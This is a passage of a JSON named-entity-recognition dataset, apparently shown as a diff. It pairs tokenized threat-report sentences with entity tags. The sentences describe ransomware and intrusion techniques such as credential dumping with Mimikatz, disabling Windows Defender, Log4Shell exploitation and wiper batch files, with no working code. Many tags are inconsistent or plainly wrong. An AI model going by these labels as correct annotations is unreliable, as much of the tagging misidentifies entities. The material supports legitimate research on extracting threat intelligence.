- "typically", - "removed", - "using", - "wevtutil,", - "a", - "batch", - "script,", - "or", - "CCleaner." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Windows", - "Defender,", - "other", - "anti-malware", - "solutions", - "and", - "monitoring", - "tools", - "are", - "disabled", - "utilizing", - "a", - "process", - "explorer", - "tool," - ], - "ner_tags": [ - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Firewall", - "rules", - "have", - "occasionally", - "been", - "seen", - "being", - "disabled", - "as", - "well." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "defense", - "evasion", - "phase,", - "anti-malware", - "and", - "monitoring", - "software", - "is", - "often", - "disabled." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "is", - "a", - "key", - "player", - "in", - "dumping", - "credentials", - "but", - "LockBit", - "2.0", - "has", - "been", - "occasionally", - "seen", - "utilizing", - "MiniDump", - "as", - "well." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "been", - "seen", - "using", - "the", - "PowerShell", - "module", - "InvokeGPUpdate", - "to", - "update", - "the", - "group", - "policy." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Most", - "PowerShell", - "scripts", - "involved", - "in", - "LockBit", - "2.0", - "cases", - "are", - "Base64", - "encoded." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "system", - "information", - "such", - "as", - "hostname,", - "shares,", - "and", - "domain", - "information." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "been", - "known", - "to", - "self-propagate", - "via", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "a", - "method", - "of", - "lateral", - "movement", - "and", - "a", - "tool", - "for", - "downloading/executing", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "AnyDesk", - "has", - "been", - "the", - "most", - "common", - "legitimate", - "desktop", - "software", - "used", - "to", - "establish", - "an", - "interactive", - "command", - "and", - "control", - "channel,", - "with", - "ConnectWise", - "seen", - "slightly", - "less", - "frequently." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Operates", - "as", - "a", - "file", - "grabber" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "UPX", - "packed", - "sample" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "unpacks" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "brute", - "forcing", - "post-infection", - "to", - "automate", - "local", - "and", - "global", - "spreading", - "attempts." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "brute", - "forcing" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "multiple", - "levels", - "of", - "encoded", - "commands," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "multiple", - "levels", - "of", - "Base64", - "encoding" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "three", - "base64", - "encoded", - "echo", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encoded", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "itself", - "from", - "malicious", - "servers" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker", - "began", - "adding", - "the", - "lwp-download", - "command", - "as", - "a", - "failover", - "for", - "wget", - "and", - "curl", - "to", - "enable", - "downloading", - "commands" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download,", - "and", - "configure" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "of", - "downloading", - "and", - "setting", - "persistence", - "of", - "some", - "other", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "a", - "specific", - "payload" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decoded", - "into", - "a", - "new", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "payload", - "contains", - "two", - "additional", - "base64", - "encoded", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "attempted", - "to", - "use", - "cached", - "credentials", - "from", - "local", - "accounts", - "to", - "gain", - "initial", - "access", - "to", - "additional", - "systems", - "within", - "an", - "internal", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploits", - "known", - "vulnerabilities", - "in", - "internet-facing", - "applications" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDump,", - "“a", - "C#", - "implementation", - "of", - "mimikatz/pypykatz", - "minidump", - "functionality", - "to", - "get", - "credentials", - "from", - "LSASS", - "dumps”" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Usernames" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "and", - "hostnames", - "collected" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "is", - "used", - "to", - "connect", - "to", - "systems", - "in", - "the", - "same", - "network", - "via", - "SMB,", - "to", - "write", - "a", - "batch", - "file", - "to", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "push", - "batch", - "files", - "over", - "SMB", - "to", - "other", - "systems", - "within", - "an", - "internal", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "write", - "a", - "batch", - "file", - "to", - "disk", - "that", - "executes", - "the", - "Fantasy", - "wiper,", - "and", - "then", - "run", - "that", - "batch", - "file", - "via", - "PsExec", - "with", - "this", - "command", - "line", - "string" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "writing", - "the", - "batch", - "file", - "to", - "disk", - "and", - "executing." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "another", - "batch", - "file,", - "system.bat," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "B-SamFile" - ] - }, - { - "tokens": [ - "writes", - "another", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file", - "in", - "Figure", - "7,", - "which", - "Sandals", - "creates", - "on", - "remote", - "systems", - "to", - "launch" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "both", - "use", - "batch", - "files", - "that", - "run", - "via", - "the", - "Windows", - "command", - "shell." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ease", - "of", - "batch", - "file", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "write", - "the", - "batch", - "file", - "on", - "the", - "remote", - "system." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "writes", - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "lists", - "the", - "command", - "line", - "arguments", - "accepted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "all", - "files", - "written", - "to", - "disk", - "in", - "the", - "current", - "working", - "directory" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "deletes", - "the", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "the", - "directory", - "with", - "the", - "files", - "causing", - "the", - "errors" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "recursively", - "deletes", - "all", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "deletion", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "File", - "deletion", - "functions" - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "File", - "deletion", - "functions" - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "then", - "deletes", - "the", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decoded", - "command", - "line", - "parameter" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "base64", - "string" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "base64-encoded", - "argument" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "base64", - "encoded", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "collects", - "a", - "list", - "of", - "fixed", - "drives", - "but", - "excludes", - "the", - "drive", - "where", - "the", - "%WINDOWS%", - "directory", - "exists." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Then", - "it", - "enters", - "a", - "for", - "loop", - "iterating", - "over", - "the", - "drive", - "list", - "to", - "build", - "a", - "recursive", - "directory", - "listing" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shows", - "that", - "the", - "directory", - "listing", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Directory", - "listing", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ",", - "the", - "GetSubDirectoryFileListRecursive", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Recursive", - "directory", - "listing", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "then", - "self-deletes." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "bat", - "deletes", - "itself" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attempts", - "to", - "clear", - "file", - "system", - "cache", - "memory,", - "and", - "self-deletes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "deletes", - "the", - "Fantasy", - "wiper", - "from", - "disk", - "and", - "then", - "deletes", - "itself." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "batch", - "file", - "in", - "%WINDOWS%\\Temp", - "called", - "registry.bat." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "deletes", - "the", - "following", - "registry", - "keys:", - "HKCR\\.EXE", - "HKCR\\.dll", - "HKCR\\*" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Then", - "it", - "runs", - "the", - "following", - "to", - "attempt", - "to", - "clear", - "file", - "system", - "cache", - "memory:", - "%windir%\\system32\\rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "GetSubDirectoryFileListRecursive", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "LookupPrivilegeValue", - "and", - "AdjustTokenPrivilege", - "APIs" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "operators", - "attempted", - "to", - "capture", - "cached", - "credentials", - "and", - "then", - "use", - "them", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "built-in", - "Windows", - "user", - "account", - "DefaultAccount." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "built-in", - "Windows", - "user", - "account", - "[T1078.001]", - "to", - "move", - "laterally" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPS", - "activity", - "from", - "IP", - "address", - "to", - "the", - "organization’s", - "VMware", - "server." - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Following", - "HTTPS", - "activity," - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "outgoing", - "HTTPS", - "port", - "443", - "connections", - "to", - "and", - "(the", - "prior", - "domain", - "in", - "reverse)." - ], - "ner_tags": [ - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encoded", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "next", - "stage", - "and", - "execute", - "it\"" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "downloaded", - "malware", - "and", - "multiple", - "tools", - "to", - "the", - "network,", - "including", - "PsExec,", - "Mimikatz,", - "and", - "Ngrok." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "exclusion", - "rule", - "allowlisted", - "the", - "entire", - ",", - "enabling", - "threat", - "actors", - "to", - "download", - "tools", - "to", - "the", - "without", - "virus", - "scans." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "added", - "an", - "exclusion", - "rule", - "to", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "manually", - "disabled", - "Windows", - "Defender", - "via", - "the", - "Graphical", - "User", - "Interface", - "(GUI)" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "added", - "an", - "exclusion", - "rule", - "to", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "The", - "tool", - "allowlisted", - "the", - "entire", - "c:\\drive,", - "enabling", - "the", - "actors", - "to", - "bypass", - "virus", - "scans", - "for", - "tools", - "they", - "downloaded", - "to", - "the", - "c:\\drive." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "manually", - "disabled", - "Windows", - "Defender", - "via", - "the", - "GUI." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "also", - "moved", - "laterally", - "to", - "the", - "domain", - "controller,", - "compromised", - "credentials," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "gained", - "access", - "to", - "a", - "VMware", - "service", - "account", - "with", - "administrator", - "and", - "system", - "level", - "access" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "February", - "2022,", - "the", - "threat", - "actors", - "exploited", - "Log4Shell", - "[T1190]", - "for", - "initial", - "access" - ], - "ner_tags": [ - "O", - "I-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "exploited", - "Log4Shell", - "for", - "initial", - "access", - "to", - "the", - "organization’s", - "VMware", - "Horizon", - "server." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "exploit", - "payload", - "created", - "a", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Scheduled", - "Task", - "was", - "named", - "to", - "masquerade", - "as", - "a", - "legitimate", - "Windows", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors’", - "exploit", - "payload", - "created", - "Scheduled", - "Task", - "RuntimeBrokerService.exe,", - "which", - "executed", - "RuntimeBroker.exe", - "daily", - "as", - "SYSTEM." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "actors", - "used", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "actors", - "leveraged", - "RDP", - "to", - "propagate", - "to", - "several", - "hosts", - "within", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "were", - "able", - "to", - "proxy", - "[T1090]", - "RDP", - "sessions," - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "RDP", - "to", - "move", - "laterally", - "to", - "multiple", - "hosts", - "on", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "Ngrok", - "to", - "proxy", - "RDP", - "connections", - "and", - "to", - "perform", - "command", - "and", - "control." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "reverse", - "proxy", - "tool", - "for", - "proxying", - "an", - "internal", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "–", - "a", - "credential", - "theft", - "tool." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "then", - "executed", - "Mimikatz", - "on", - "VDI-KMS", - "to", - "harvest", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Additionally,", - "the", - "threat", - "actor", - "was", - "observed", - "attempting", - "to", - "dump", - "the", - "Local", - "Security", - "Authority", - "Subsystem", - "Service", - "(LSASS)", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "actors", - "were", - "observed", - "trying", - "to", - "dump", - "LSASS", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Mimikatz", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "were", - "able", - "to", - "proxy" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Ngrok", - "to", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "removed", - "malicious", - "file", - "mde.ps1", - "from", - "the", - "dis." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "executed,", - "mde.ps1", - "downloaded", - "from", - "and", - "removed", - "from", - "the", - "disk" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "phishing", - "emails", - "with", - "malicious", - "HTML", - "attachments", - "to", - "all", - "addresses", - "in", - "the", - "victim’s", - "mailbox." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "additional", - "phishing", - "emails", - "to", - "the", - "victim’s", - "contacts" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "phishing", - "email" - ], - "ner_tags": [ - "B-Way", - "I-Way" - ] - }, - { - "tokens": [ - "starts", - "with", - "an", - "income", - "tax-themed", - "phishing", - "email", - "written", - "in", - "Spanish,", - "disguising", - "itself", - "as", - "a", - "tax", - "receipt", - "notification" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "disseminate", - "additional", - "phishing", - "emails", - "to", - "the", - "victim’s", - "contacts." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "phishing", - "emails", - "with", - "malicious", - "HTML", - "attachments", - "to", - "all", - "addresses", - "in", - "the", - "victim’s", - "mailbox." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "constructs", - "an", - "email", - "with", - "a", - "hardcoded", - "subject", - "and", - "body", - "and", - "attaches", - "the", - "HTML", - "file", - "from", - "the", - "“fb”", - "folder." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "the", - "victim’s", - "login", - "credentials", - "for", - "various", - "online", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "login", - "credentials" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "targets", - "victim’s", - "login", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credentials" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "attempt", - "to", - "compromise", - "the", - "victim’s", - "login", - "credentials", - "for", - "webmail", - "services" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keystrokes" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "keylogging," - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "logs", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "logging", - "keystrokes", - "via", - "polling", - "and", - "application", - "hooks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "logging", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "operating", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "system", - "information," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "performs", - "surveillance", - "on", - "the", - "victim’s", - "machine", - "by", - "collecting", - "system", - "information", - "such", - "as", - "hostnames,", - "IPv4", - "address,", - "operating", - "system", - "version,", - "disk", - "volume", - "information,", - "disk", - "size", - "and", - "anti-virus", - "software", - "information,", - "and", - "gets", - "the", - "system’s", - "default", - "language." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "multiple", - "hosts,", - "including", - "an", - "Amazon", - "Web", - "Services", - "(AWS)", - "Elastic", - "Compute", - "Cloud", - "(EC2)", - "instance,", - "accessed", - "through", - "its", - "public", - "URL,", - "to", - "host", - "the", - "malicious", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - 